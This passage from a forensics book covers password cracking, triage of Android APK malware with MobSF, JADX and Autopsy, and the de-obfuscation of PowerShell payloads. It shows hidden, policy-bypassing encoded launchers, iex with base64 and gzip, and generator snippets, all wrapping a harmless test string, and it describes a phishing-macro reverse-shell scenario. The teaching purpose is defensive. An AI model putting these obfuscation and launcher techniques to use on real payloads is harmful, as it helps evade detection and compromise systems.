hash extraction to start the process of cracking a password. John the Ripper can also be used instead of Hashcat to crack the actual hash, and it can also mangle wordlists in a similar fashion to the previously described method of using Hashcat on a Linux machine. More info on John the Ripper can be found on their website¹¹⁶. ¹¹²https://www.youtube.com/watch?v=lOTDevvqOq0&ab_channel=DFIRScience ¹¹³https://www.kali.org/tools/crunch/ ¹¹⁴https://www.youtube.com/c/13cubed ¹¹⁵https://www.youtube.com/watch?v=EfqJCKWtGiU&ab_channel=13Cubed ¹¹⁶https://www.openwall.com/john/
  • 94. Chapter 3 - Password Cracking for Beginners 87 Conclusion This has just been a brief dive into showing how easy it is to crack simple passwords and hopefully will show why strong passwords are so important. The Windows operating system uses a weak form of encryption for its passwords, and this is a place to start when trying to crack passwords for fun or security testing purposes. Even with strong encryption methods, a weak or reused password will not be sufficient to safeguard the data. Knowing these methods are out there to defeat user passwords should show the user why it is so important to use strong passwords and why it is a bad idea to reuse passwords between accounts. A better understanding of the attack methods against passwords should encourage everyone to use better security practices to safeguard their data. References Cubrilovic, N. C. (2009, December 14). TechCrunch is part of the Yahoo family of brands. Retrieved May 12, 2022, from TechCrunch¹¹⁷ crunch | Kali Linux Tools. (2021, September 14). Retrieved July 1, 2022, from Kali Linux¹¹⁸ Fast password cracking - Hashcat wordlists from RAM. (2022, June 15). Retrieved June 22, 2022, from YouTube¹¹⁹ Introduction to Hashcat. (2017, July 20). Retrieved June 22, 2022, from YouTube¹²⁰ John the Ripper password cracker. (n.d.). Retrieved June 22, 2022, from John the Ripper¹²¹ Harley (2020, November 16). Using Hashcat Rules to Create Custom Wordlists. Infinite Logins. Re- trieved September 8, 2022, from https://infinitelogins.com/2020/11/16/using-hashcat-rules-to-create- custom-wordlists/ hashcat - advanced password recovery. (n.d.). Retrieved May 12, 2022, from Hashcat¹²² Patton, B. (2022, March 25). NTLM authentication: What it is and why you should avoid using it. Retrieved May 12, 2022, from The Quest Blog¹²³ Picolet, J. (2019). Hash Crack: Password Cracking Manual (v3). Independently published. W34kp455. (2014). Weakpass. Retrieved May 12, 2022, from Weakpass¹²⁴ ¹¹⁷https://techcrunch.com/2009/12/14/rockyou-hack-security-myspace-facebook-passwords/ ¹¹⁸https://www.kali.org/tools/crunch/ ¹¹⁹https://www.youtube.com/watch?v=lOTDevvqOq0&ab_channel=DFIRScience ¹²⁰https://www.youtube.com/watch?v=EfqJCKWtGiU&ab_channel=13Cubed ¹²¹https://www.openwall.com/john/ ¹²²https://hashcat.net/hashcat/ ¹²³https://blog.quest.com/ntlm-authentication-what-it-is-and-why-you-should-avoid-using-it/ ¹²⁴https://weakpass.com/
  • 95. Chapter 4 - Large Scale Android Application Analysis By s3raph¹²⁵ | Website¹²⁶ | Discord¹²⁷ Overview This chapter provides a cursory overview of Android application analysis through automated and manual methods followed by a methodology of adjusting to scale. Introduction Mobile forensics, specifically as it pertains to Android devices, tends to focus a little more heavily on application analysis during the initial evaluation. Unlike Windows systems, the sandbox nature of the devices (assuming they aren’t and/or can’t be easily rooted), makes it a little more difficult to gain a deeper forensic image without first compromising an existing application (such as malicious webpages targeting exploits in Chrome or through hijacking an insecure update process in a given application), utilizing a debugging or built-in administrative function, or through installing an application with greater permissions (both methods would still require privilege escalation to root). A typical stock Android phone had at least between 60 to 100+ applications installed at any given time, while more recent phones have more than 100+. This includes system applications maintained by Google, device/manufacturer applications such as with Huawei or Samsung, and network provider ¹²⁵https://github.com/s3raph-x00/ ¹²⁶https://www.s3raph.com/ ¹²⁷http://discordapp.com/users/598660199062044687
  • 96. Chapter 4 - Large Scale Android Application Analysis 89 applications such as with Sprint, Vodafone, or Verizon. Additionally, device manufacturers and network provides typically have agreements with various companies, such as Facebook, to preinstall their application during device provisioning. Most of these applications cannot be easily pulled during forensic analysis without utilizing some method of physical extraction (i.e., use of Qualcomm Debugger functionality) or root access. Part 1 - Automated Analysis If during a forensic analysis you are lucky enough to get all of the Android applications resident on the system, you are left with the problem of analyzing more than 100+ applications. Most Android application analysis tools typically are developed to do automated analysis of individual applications with some ability to do a comparative analysis of two APKs. In this space, MobSF¹²⁸ is considered one of the most popular application analysis tools. This tool does provide a method for dynamically generating an automated analysis of various APKs with varying levels of success with both automated static and dynamic analysis. Installation of this tool is fairly easy and the developer has fairly robust documentation. (Please refer to: https://mobsf.github.io/docs/#/installation) for the most up to date instruc- tions. The installation instructions following works at the moment: sudo apt-get install git python3.8 openjdk-8-jdk python3-dev python3-venv python 3-pip build-essential libffi-dev libssl-dev libxml2-dev libxslt1-dev libjpeg8-dev z lib1g-dev wkhtmltopdf git clone https://github.com/MobSF/Mobile-Security-Framework-MobSF.git cd Mobile-Security-Framework-MobSF sudo ./setup.sh If you plan on installing this on a VM, please note that dynamic analysis is not really supported. If you were able to modify MobSF to run in a VM, there is signficant probability of specific functionality failing to properly execute and any results would not be consistent or trustworthy. Personally, I use my own virtualized environment separate from MobSF which will potentially be discussed in another guide. ¹²⁸https://github.com/MobSF/Mobile-Security-Framework-MobSF
  • 97. Chapter 4 - Large Scale Android Application Analysis 90 Once installed, you can run MobSF with the following simple command within the MobSF directory <Mobile-Security-Framework-MobSF>. ./run.sh Additionally, you can specify the listening address and listening port as MobSF starts its own web server for user interaction. The following default setting will be used if the command is started without arguments: 0.0.0.0:8000 Example post run: Accessing the hosted webpage with your favorite browser shows the following webpage:
  • 98. Chapter 4 - Large Scale Android Application Analysis 91 From here, you can upload the binary to the MobSF instance in your virtual machine: From here, most times the webpage will time out so click Recent Scans which shows the following:
  • 99. Chapter 4 - Large Scale Android Application Analysis 92 Because we are in a VM, the dynamic report will be unavailable but the static report should provide the primary details for initial triage of the application. After a few minutes and depending on the size of the application, the report will be ready for analysis: Now for analysis of malware, there are a number of websites hosting samples for training and tool development but I have typically found vx-underground.org¹²⁹ fairly robust. ¹²⁹https://www.vx-underground.org/
  • 100. Chapter 4 - Large Scale Android Application Analysis 93 The malware needs to be extracted with the password infected and renamed with the extension .apk. The scan by MobSF showed the following details: There are two options to view either a Static Report or Dynamic Report. Because we are in a virtual machine, there will not be an available Dynamic report. The Static Report shows the following information: Outside of the calculated hashes, the actual information needed for an assessment is further down:
  • 101. Chapter 4 - Large Scale Android Application Analysis 94 The section in the above right shows that MobSF stored the decompiled Java code which can be compared to the results and referenced later. The section below shows the signing certificate has an unusual xuhang string in almost all of the issuer information. The next section of interest is related to the requested permissions: Permissions such as MOUNT_UNMOUNT_FILESYSTEMS for what appears to be a game looks incredibly unusual. Other sections of interest include various API functions that could potentially indicate application capabilities.
  • 102. Chapter 4 - Large Scale Android Application Analysis 95 For example, clicking on the com/g/bl.java shows the following code segment: Generally speaking, the function to pass commands to /system/bin/sh should be scrutinized and typically is indicative of malicious intent. This isn’t always the case as applications that provide system functionality typically use sh as a means to use native Android OS tools such as ping.
  • 103. Chapter 4 - Large Scale Android Application Analysis 96 Another area of concern is the collection and sending of sensitive device information to include the IMSI and wireless MAC address: While the functions and information accessed appear malicious, validating any suppositions with actual evidence of malicious intent would be prudent. The additional analysis is beyond the scope of this initial writeup but is typical of most malware analysis methodologies.
  • 104. Chapter 4 - Large Scale Android Application Analysis 97 Part 2 - Manual Analysis Now that we have done some initial analysis of an APK with an automate tool such as MobSF, let’s dive into doing some manual analysis using JADX¹³⁰. JADX is an APK decompiler that converts compiled APKs and DEX files into readable decomplied code. The source code and compiled releases for JADX provides both a CLI and GUI based application that runs on Linux, macOS, and Windows. After opening one of the APKs within JADX a breakdown of the stored decompiled code, resources, and embedded files can be seen: Whether malicious or not, most Android applications have some level of obfuscation. In this case, the major programmatic functionality is not obfuscated but the names of the classes (a, b, c, etc.) do not have significant meaning and can make initial analysis more difficult: ¹³⁰https://github.com/skylot/jadx
  • 105. Chapter 4 - Large Scale Android Application Analysis 98 One area that should be checked is the APK signature and certificate details: This matches what MobSF had reported. It is possible to get differing results from different tools so double/triple checking relevant details is important. Another area for analysis is the AndroidManifest.XML file stored within the Resources folder structure:
  • 106. Chapter 4 - Large Scale Android Application Analysis 99 Here we see the same significant number of permissions along with some third-party application app keys which appear to be directly associated to the following GitHub repository: https://github.com/angcyo/umeng. Interestingly, the following topic on Alibaba cloud references both the WRITE_EXTERNAL_STORAGE permission as required to dynamically update APKs using UMENG and the associated APPKEY: https://topic.alibabacloud.com/a/use-umeng-to- automatically-update-apk-and-umeng-apk_1_21_32538466.html.
  • 107. Chapter 4 - Large Scale Android Application Analysis 100 This obviously has the implication, if true, that even if there is not malicious logic baked directly into the application during dynamic and static analysis that the application could be manipulated at any later time. Beyond this initial triage is out of scope for the write-up but this portion of analysis is important to highlight the need for manual analysis and need to read contextual clues. Any automation should be validated and checked regardless of scaling.
  • 108. Chapter 4 - Large Scale Android Application Analysis 101 While usually successful, it should be noted that JADX cannot always decompile the compiled code to Java and any errors should be parsed to ensure that the uncompiled code does not have any malicious logic. The following screenshot shows a typical de-compilation error: The concept of this writeup was to provide a cursory analysis of a piece of malware that would provide the foundation of automating large scale analysis of APKs. The foundation begins at minimum with some of the above techniques (permissions and signatures) but also on basic threat hunting aspects such as searching for various exploitation techniques and indicators of compromise. In that sense, hard coded references to /system/bin/sh, hard coded IP addresses, and unusual permissions are fairly easy using the built-in search functionality:
  • 109. Chapter 4 - Large Scale Android Application Analysis 102 I would recommend enabling searching within comments as sometimes additional functionality using external APIs and websites are simply commented out but otherwise accessible. Problem of Scale So far, we have covered the bare basics of using MobSF to analyze an APK as well as how to manually interrogate the same APK using JADX. In most malware mobile forensic investigations with physical access (not logical) most stock Android phones have more than 100+ APKs (including system applications, device manufacturer applications, network provider applications, and third- party applications) that could need to be analyzed. Devices in active usage could reach beyond 200+ APKs that could potentially need to be analyzed. 200+ APKs is a significant number of applications for a malware forensic analysis but the investigation could be completed using MobSF and JADX in a few weeks. The problem comes at scale by expanding the number of devices being analyzed. Now you may have 100+ devices, each with 100+ APKs that may or may not be the same version. This quickly becomes untenable which results in a need to develop or adapt mobile application analysis methodology to scale.
  • 110. Chapter 4 - Large Scale Android Application Analysis 103 Part 3 - Using Autopsy, Jadx, and Python to Scrap and Parse Android Applications at Scale The last scenario isn’t a hypothetical one, it is one that I had to adjust and adapt methodology for. To start with the forensic analysis, you need to have an Android image to work with. If you have one saved from a test device using Cellebrite that can be used to test and develop the solution at scale. If you don’t, you can simply pull a virtual machine from osboxes.org¹³¹. Keep in mind there are significant differences between x86 and ARM architectures and Android versions so don’t be hyper specific in file locations and file names. Pro-Tip: Using an Android VM (either from osboxes.org or another source) along with a host- only network adapter can allow you to capture and manipulate network traffic (including some SSL encrypted traffic) by using your brand of network collection (Security Onion¹³² or simple WireShark¹³³) and a MiTM proxy with SSLStrip ([BetterCap¹³⁴). Combined with a code injection tool with memory reading capabilities (Frida¹³⁵) this can be the foundation of more advanced dynamic analysis methodologies. Once you have the appropriate image file (vmdk, bin, img, etc.), you can create a new case within Autopsy: ¹³¹https://www.osboxes.org/android-x86/ ¹³²https://github.com/Security-Onion-Solutions/securityonion ¹³³https://gitlab.com/wireshark/wireshark ¹³⁴https://github.com/bettercap/bettercap ¹³⁵https://github.com/frida/frida
  • 111. Chapter 4 - Large Scale Android Application Analysis 104 Select Disk Image or VM file as seen below:
  • 112. Chapter 4 - Large Scale Android Application Analysis 105 Select the appropriate image file: Select the appropriate Ingest Modules (you can leave this default for now; we will come back here).
  • 113. Chapter 4 - Large Scale Android Application Analysis 106 Continue through the default options until the data source is ingested as seen below: At this point we have the basic test and development case setup. Now it is time to start developing a solution to the problem of scale. The first portion of the problem is to find a relatively simple and automated solution to pull APK files from data sources. Autopsy has a specific capability that it allows you to use specifically designed Python plugins to automate such tasks. By using public examples (such as https://github.com/markmckinnon/Autopsy-Plugins), I modified one of the simpler Python scripts to search for and flag files with the .apk extension (amongst others):
  • 114. Chapter 4 - Large Scale Android Application Analysis 107 Please Note: In the script referenced above is a hardcoded file location to pull the found files to. This must be modified to match your system. Dynamically pulling the folder location appeared too difficult at the time due to Autopsy using modified Python methods that are cross compiled into Java (things get weird). Additionally, the following wiki¹³⁶ hasn’t really been updated so a significant amount of testing is needed. To aid in your troubleshooting, the location of the log file can be accessed by going to the case folder: ¹³⁶http://www.sleuthkit.org/autopsy/docs/api-docs/4.9.0/
  • 115. Chapter 4 - Large Scale Android Application Analysis 108 Going to the log folder:
  • 116. Chapter 4 - Large Scale Android Application Analysis 109 Finally, opening one of the plain text log files: Unfortunately, this file is locked while Autopsy is running and you must close Autopsy to view any associated error. Once a Python script has been developed and tested, you have to manually add in the Python plugin to the appropriate folder. A simple link can be accessed from the menu option below:
  • 117. Chapter 4 - Large Scale Android Application Analysis 110 To add the python plugin, you simply move an appropriate named folder structure containing the python modules into the following directory: Now simply restart Autopsy and right click the data source you wish to run the plugin against:
  • 118. Chapter 4 - Large Scale Android Application Analysis 111 Similar to before, if all is well a new option should be present: Now simply click Deselect All (since they have already run) and click your custom tool. If you are using a barebones osboxes VM it would be prudent to add some various APKs. Once the module finished running you should see the following:
  • 119. Chapter 4 - Large Scale Android Application Analysis 112 So now we have a way to automate scraping of APK files, to continue now we need to do some rudimentary analysis. Remember how JADX had a CLI? This functionality can help decompile the APKs fairly quickly allowing for additional analysis using REGEX, individual file hashing, and other forensicating things. In this situation, I developed a companion script using Python (YAAAAT_- apk_ripper) that has embedded the functionalities required for my use case Yet Another Android Application Tool¹³⁷: The following code section shows the functionality of running JADX and dumping the output to the case_extract folder: ¹³⁷https://github.com/s3raph-x00/YAAAAT
  • 120. Chapter 4 - Large Scale Android Application Analysis 113 This script works by iteratively going through the case_extract/apk folder structure and attempts to be fairly fault tolerant in the case of incorrect file extension or file corruption. Beyond the simple JADX decompiling functionality, additional functions can be added by analyzing the code sections of the decompiled APK using REGEX: The above code section attempts to find high confidence URLs within the code base and extract the information to a mapped log file for manual analysis. There are other regex solutions to map out potential URLs which helps mitigate missing aspects of URL crafting. Besides JADX, to parse embedded certificates (for APK signature analysis and potential Certificate pinning implmenetations) the script incorporates Java keytool if Java JDK is present and some methods using OpenSSL if not:
  • 121. Chapter 4 - Large Scale Android Application Analysis 114 The methods aren’t perfect by any means and more testing across a number of different certificate implementations are needed. Despite this, it is similar to the automated single analysis using MobSF and manual analysis with JADX but also allows for larger scale analysis of APK signatures. This script is far from perfect or complete but foundationally provided the basic methodology to extract specific information desired for large-scale analysis. The usage of Splunk becomes useful in this context as the data contained in the text files can be ingested and parsed allowing for larger-scale analysis in areas such as granular file changes in the embedded APKs, the addition of URLs and IP addresses, and other anomalies. This write-up does not go into extensive detail about every specific use case but hopefully given enough time, effort, and data you can scale the application analysis methodology to suit your needs. Regardless of the implementation, Android APIs and APKs are changing frequently so ensure to retest solutions and manually spot-check results to ensure it still fits the goal of the solution.
  • 122. Chapter 5 - De-Obfuscating PowerShell Payloads By Tristram¹³⁸ | Twitter¹³⁹ | Discord¹⁴⁰ Introduction I have had the pleasure of working with many individuals within the cyber security field, belonging to both the blue and red teams, respectively. Regardless of which side you prefer to operate on, whether you’re a penetration tester looking to put an organization’s security program to the test or a blue teamer looking to stomp on adversaries during every step of their desired campaign, we are ultimately on the same side. We are advisors to risk and we offer guidance on how to eliminate that risk; the difference is being how we respond. We are ultimately on the same team, operating as one entity to ensure the security and integrity of the organizations we serve and the data that they protect. Part of how we work towards this common goal is through professional development and imparting our knowledge to others. Projects such as this are an example of why our security community is strong. We care, we learn, we grow. Together, there is nothing that will stop us from being successful. As an individual who is primarily a blue teamer with roots in penetration testing, I am looking to impart unto you some of the common scenarios that I have faced that I feel would help provide you the foundation and confidence you’re looking for to comfortably break down obfuscated PowerShell payloads. ¹³⁸https://github.com/gh0x0st ¹³⁹https://twitter.com/jdtristram ¹⁴⁰http://discordapp.com/users/789232435874496562
  • 123. Chapter 5 - De-Obfuscating PowerShell Payloads 116 What Are We Dealing With? PowerShell is a powerful scripting language that has eased the process of managing Windows systems. These management capabilities have evolved over years as PowerShell has expanded from its exclusive Windows roots and has become accessible on other systems such as macOS and Linux. Despite the technological advances this solution has provided system administrators over the years, it has also provided penetration testers and cyber criminals similar opportunities to be successful. This success resonates with proof of concept exploit code for major vulnerabilities such as what we saw with PrintNightmare / CVE-2021-34527 (https://github.com/nemo-wq/PrintNightmare-CVE- 2021-34527). One of the hurdles people will find when they use PowerShell for these types of activities is that the code will ultimately be accessible in plain text. While this is helpful for security researchers to learn from others and their published exploit code, it’s equally as helpful for security providers to reverse engineer and signature these payloads to prevent them from doing harm. For blue teamers, this is a good thing, however for penetration testers, as well as cyber criminals, this will directly impact their success. In an effort to obstruct the progress of security providers from being able to easily signature their payloads, they will introduce various levels of obfuscation to help hide their code in plain sight. While this helps the red teamers, it unfortunately makes our job as blue teamers a bit more difficult. However, with a little bit of exposure to common obfuscation techniques and how they work, you will find that deobfuscating them is well within your grasp. Through this chapter, I am looking to expose you to the following obfuscation techniques and how you can de-obfuscate them. 1. Base64 Encoded Commands 2. Base64 Inline Expressions 3. GZip Compression 4. Invoke Operator 5. String Reversing 6. Replace Chaining 7. ASCII Translation
  • 124. Chapter 5 - De-Obfuscating PowerShell Payloads 117 Stigma of Obfuscation While Obfuscation in essence is a puzzle of sorts and with every puzzle, all you need is time. It’s important to understand that obfuscation is not be-all and end-all solution to preventing payloads from being signatured. If you continue to use the same obfuscated payload or obfuscation technique, it will eventually get busted. This reality can cause debates in the security community on it’s overall effectiveness, but it’s important for us to understand that obfuscation serves two purposes for red teams: Bypass various signature based detections from anti-virus solutions as well as AMSI; To buy time in the event the payload is successful, but later discovered by a blue team. The process of bypassing security solutions is a trivial process, but where the gap typically exists is with the second bullet when we are responding to incidents involving these payloads. Let’s put this into perspective with a commonly experienced scenario: Assume we are a penetration tester and we are performing an assessment against an organization. We managed to obtain a list of valid email addresses and decided to try to launch a phishing campaign. With this phishing campaign, we emailed the staff a word document that contains a macro that launches a remote hosted PowerShell script that contains a reverse shell and neither the document or script is flagged by any known anti-virus. At some point the user reports the email and we launch our phishing assessment procedures and identify that the user did in fact open the email and got pwned. From the firewall logs we are able to see where they connected to and were able to plug the hole. Continuing our incident response procedures, we follow up on the embedded payload to ensure that it doesn’t include another logic that does anything else that we don’t already know about, such as mechanisms where it has a more than one remote address it can reach out to in the event one gets discovered. As the penetration tester, we coded contingencies for this very scenario so that our payload does in fact use more than one remote address. To ensure our extra effort doesn’t get steam rolled, we obfuscated our payload so the blue team would have to spend extra time lifting the veil, buying us more time to hopefully move laterally through the network, away from the point of entry. This is the barrier that must be able to be avoided within a reasonable amount of time so that we can ensure that the threat we have evicted from our network stays evicted. As a blue teamer, if you’re exposed to a complicated or unfamiliar obfuscation technique, then chances are you may move onto something else or spend too much time trying to uncover its secrets. To help overcome this obstacle, we will step through various obfuscation techniques, including how they’re generated and how you can deobfuscate them.
  • 125. Chapter 5 - De-Obfuscating PowerShell Payloads 118 Word of Caution It goes without saying that when dealing with PowerShell payloads that are malicious or otherwise suspicious then you should avoid trying to dissect these payloads on your production machine. No one wants to be responsible for a breach or get compromised themselves because they accidentally executed a piece of code that they did not understand. A good practice is to always have a sandbox solution on standby. You can use a local sandbox, such as a virtual machine, that has no connected network adapters, or at least configured on an entirely separate internet connection that contains no sensitive assets on the network. In addition to this, being sure you have enough storage for snapshots is very useful. This way if you accidentally compromise your sandbox, or want to get it back to a known-working state, then you can simply revert it and continue where you left off.
  • 126. Chapter 5 - De-Obfuscating PowerShell Payloads 119 Base64 Encoded Commands One of the first methods to obfuscate PowerShell payloads utilized a provided feature of the powershell.exe executable itself. Specifically, this executable supports the -EncodedCommand parameter that accepts a base64 encoded string. Once called, PowerShell would decode the string and execute the code therein. While this is trivial to decode, it was a method that was enhanced with additional optional parameters. These optional parameters can also be called using partial names so long as it’s unambiguous, which is a common practice with this particular launcher. This is arguably the most popular approach and is also one of the easiest to discover when reviewing the logs. Let’s take a look at the following payload of this technique and break it down. 1 powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc 'VwByAGkAdABlAC0ATwB1AHQAcAB1A 2 HQAIAAiAE8AYgBmAHUAcwBjAGEAdABlAGQAIABQAGEAeQBsAG8AYQBkACIA' At a quick glance we can clearly see that powershell.exe is being called directly with 5 parameters being passed using partial names. We can look at the help file for this by running powershell -help. Let’s break down these parameters: Partial Parameter Full Parameter Description -NoP -NoProfile Does not load the Windows PowerShell profile. -NonI -NonInteractive Does not present an interactive prompt to the user. -W Hidden -WindowStyle Sets the window style to Normal, Minimized, Maximized or Hidden. -Exec Bypass -ExecutionPolicy Bypass Sets the default execution policy for the current session. -Enc -EncodedCommand Accepts a base-64-encoded string version of a command. With our newfound understanding of the parameters in play, we now break down exactly what’s happening when this gets called, specifically, this session will launch unrestricted as a hidden window. Now that we understand the behavior of the PowerShell process when executed, our next step is to identify the encoded payload that’s being executed behind the scenes. Decoding base64 is a trivial process, but we can accomplish this by using PowerShell to decode the string for this.
  • 127. Chapter 5 - De-Obfuscating PowerShell Payloads 120 Keep in mind that running this method will not execute any underlying code by itself. 1 PS C:> $Bytes = [Convert]::FromBase64String('VwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAiAE 2 8AYgBmAHUAcwBjAGEAdABlAGQAIABQAGEAeQBsAG8AYQBkACIA') 3 PS C:> $Command = [System.Text.Encoding]::Unicode.GetString($Bytes) 4 PS C:> Write-Output "[*] Decoded Command >> $Command" 5 [*] Decoded Command >> Write-Output "Obfuscated Payload" Running this method has revealed a simple payload, which was expected based on the size of the base 64 encoded string. If it was significantly larger, we could safely assume that that payload would be larger. You can replicate this obfuscation technique for decoding practice using this snippet to encode a simple one-liner, or even expand to more complex scripts. 1 PS C:> $Command = 'Write-Output "Obfuscated Payload"' 2 PS C:> $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Command) 3 PS C:> $Base64 = [Convert]::ToBase64String($Bytes) 4 PS C:> Write-Output "[*] Obfuscated: powershell.exe -NoP -NonI -W Hidden -Exec Bypa 5 ss -Enc '$Base64'" 6 [*] Obfuscated: powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc 'VwByAGkAdABlA 7 C0ATwB1AHQAcAB1AHQAIAAiAE8AYgBmAHUAcwBjAGEAdABlAGQAIABQAGEAeQBsAG8AYQBkACIA'
  • 128. Chapter 5 - De-Obfuscating PowerShell Payloads 121 Base64 Inline Expressions This method is very similar to the technique that we saw previously, except instead of passing base64 encoded strings to the powershell.exe executable, we can embed base64 encoded strings directly into our scripts themselves. Let’s see an example of this in action. 1 PS C:> iex ([System.Text.Encoding]::Unicode.GetString(([convert]::FromBase64String( 2 'VwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAiAE8AYgBmAHUAcwBjAGEAdABlAGQAIABQAGEAeQBsAG8AYQB 3 kACIA')))) The majority of most obfuscation techniques for PowerShell payloads are simply just different string manipulation techniques. In the scheme of things, strings on their own are not a risk or executable on their own, but rely on a launcher to take the string and treat it as executable code. In the above sample, let’s observe the three letter command, namely iex, which is an alias for the Invoke-Expression cmdlet. The Invoke-Expression cmdlet accepts a string which is then executed as a command. To put this into perspective, we will create a variable called $String that will store the value Get-Service’. If we pass this variable to Invoke-Expression, we will see a list of services output to the console as if we simply ran Get-Service‘. 1 PS C:> $String = 'Get-Service' 2 PS C:> Invoke-Expression $String 3 4 Status Name DisplayName 5 ------ ---- ----------- 6 Stopped AarSvc_b0e91cc Agent Activation Runtime_b0e91cc 7 Stopped AJRouter AllJoyn Router Service 8 Stopped ALG Application Layer Gateway Service 9 …SNIP… Returning to our obfuscated sample, we know that the payload is essentially built into two components: 1. The launcher (iex) 2. The base64 decoder (string / command)
  • 129. Chapter 5 - De-Obfuscating PowerShell Payloads 122 Once the base64 decoder runs, it will return a string. By passing this as an argument to iex, it will essentially execute the resulting string from the base64 decoder. We can omit the iex, and simply execute the decoder to reveal the underlying string. 1 PS C:> ([System.Text.Encoding]::Unicode.GetString(([convert]::FromBase64String('VwB 2 yAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAiAE8AYgBmAHUAcwBjAGEAdABlAGQAIABQAGEAeQBsAG8AYQBkACI 3 A')))) 4 Write-Output "Obfuscated Payload" This has revealed our obfuscated payload as Write-Output "Obfuscated Payload". If we were to include iex, our resulting string would be executed 1 PS C:> iex ([System.Text.Encoding]::Unicode.GetString(([convert]::FromBase64String( 2 'VwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAiAE8AYgBmAHUAcwBjAGEAdABlAGQAIABQAGEAeQBsAG8AYQB 3 kACIA')))) 4 Obfuscated Payload You are going to find that in most of the obfuscated scripts you’ll come across, you’ll be met with Invoke-Expression, its alias or an obfuscated representation of either. Remember, a plain string cannot be executed without a launcher. You can replicate this obfuscation technique for decoding practice using this snippet to encode a simple one-liner, or even expand to more complex scripts. 1 PS C:> $Command = 'Write-Output "Obfuscated Payload"' 2 PS C:> $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Command) 3 PS C:> $Base64 = [Convert]::ToBase64String($Bytes) 4 PS C:> iex ([System.Text.Encoding]::Unicode.GetString(([convert]::FromBase64String( 5 'VwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAiAE8AYgBmAHUAcwBjAGEAdABlAGQAIABQAGEAeQBsAG8AYQB 6 kACIA'))))
  • 130. Chapter 5 - De-Obfuscating PowerShell Payloads 123 GZip Compression A relatively successful obfuscation technique is built around compressing byte streams. Similar to how we can compress files on disk to make them smaller, we can also compress payloads and store and execute them from within a script. This technique was quite successful once it started being utilized because of its relative difficulty of breaking down the underlying code to reveal the intended payload. Let’s see an example of this. 1 $PS C:> $decoded = [System.Convert]::FromBase64String("H4sIAAAAAAAEAAsvyixJ1fUvLSko 2 LVFQ8k9KKy1OTixJTVEISKzMyU9MUQIA9Wd9xiEAAAA=");$ms = (New-Object System.IO.MemoryStr 3 eam($decoded,0,$decoded.Length));iex(New-Object System.IO.StreamReader(New-Object Sy 4 stem.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompr 5 ess))).ReadToEnd() Depending on your familiarity with .NET classes, there are some unfamiliar or potentially intimidat- ing components displayed in this code example. Additionally, we see a slightly ambiguous technique where a multiline payload is converted into an effective one-liner denoted by the use of semicolons ;. Let’s try to make this code a little easier to read by entering new lines where we see semicolons. 1 PS C:> $decoded = [System.Convert]::FromBase64String("H4sIAAAAAAAEAAsvyixJ1fUvLSkoL 2 VFQ8k9KKy1OTixJTVEISKzMyU9MUQIA9Wd9xiEAAAA=") 3 PS C:> $ms = (New-Object System.IO.MemoryStream($decoded,0,$decoded.Length)) 4 PS C:> iex(New-Object System.IO.StreamReader(New-Object System.IO.Compression.GZipS 5 tream($ms, [System.IO.Compression.CompressionMode]::Decompress))).readtoend() Great, this is now a bit easier for us to read. If this is our first time seeing this, we’d likely think the easy win is with looking at the decoded base64 string that’s stored in the first variable, let’s try it. 1 PS C:> [System.Convert]::FromBase64String("H4sIAAAAAAAEAAsvyixJ1fUvLSkoLVFQ8k9KKy1O 2 TixJTVEISKzMyU9MUQIA9Wd9xiEAAAA=") 3 31 4 139 5 8 6 0 7 …SNIP… This revealed a byte array. Even if we converted the byte array to a string by using System.Text.Encoding]::ASCII.GetString(), it would still leave us just as confused. One of the benefits of this technique is that some security providers decode these strings automatically, but in this case, it wouldn’t necessarily reveal anything immediately signaturable on its own.
  • 131. Chapter 5 - De-Obfuscating PowerShell Payloads 124 1 PS C:> [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(" 2 H4sIAAAAAAAEAAsvyixJ1fUvLSkoLVFQ8k9KKy1OTixJTVEISKzMyU9MUQIA9Wd9xiEAAAA=")) 3 ? 4 /?,I??/-)(-QP?OJ+-NN,IMQH???OLQ ?g}?! Let’s keep looking at the payload. If you remember from before, when we see iex, or invoke- expression, then it’s executing a resulting string. With this in mind, look at how iex is followed by a grouping operator () which contains a set of expressions. This tells us that iex ultimately executes the resulting code from the inner expressions. If we simply remove iex, and execute the remaining code, we’ll see the resulting code that is being executed. 1 PS C:> $decoded = [System.Convert]::FromBase64String("H4sIAAAAAAAEAAsvyixJ1fUvLSkoL 2 VFQ8k9KKy1OTixJTVEISKzMyU9MUQIA9Wd9xiEAAAA=") 3 PS C:> $ms = (New-Object System.IO.MemoryStream($decoded,0,$decoded.Length)) 4 PS C:> (New-Object System.IO.StreamReader(New-Object System.IO.Compression.GZipStre 5 am($ms, [System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd() 6 7 Write-Output "Obfuscated Payload" Fantastic, by ultimately making a readability adjustment followed by removing an iex command, we have torn down a seemingly complicated payload and revealed our obfuscated payload. You can replicate this obfuscation technique for decoding practice using this snippet to encode a simple one-liner, or even expand to more complex scripts. 1 # Generator 2 $command = 'Write-Output "Try Harder"' 3 4 ## ByteArray 5 $byteArray = [System.Text.Encoding]::ASCII.GetBytes($command) 6 7 ## GzipStream 8 [System.IO.Stream]$memoryStream = New-Object System.IO.MemoryStream 9 [System.IO.Stream]$gzipStream = New-Object 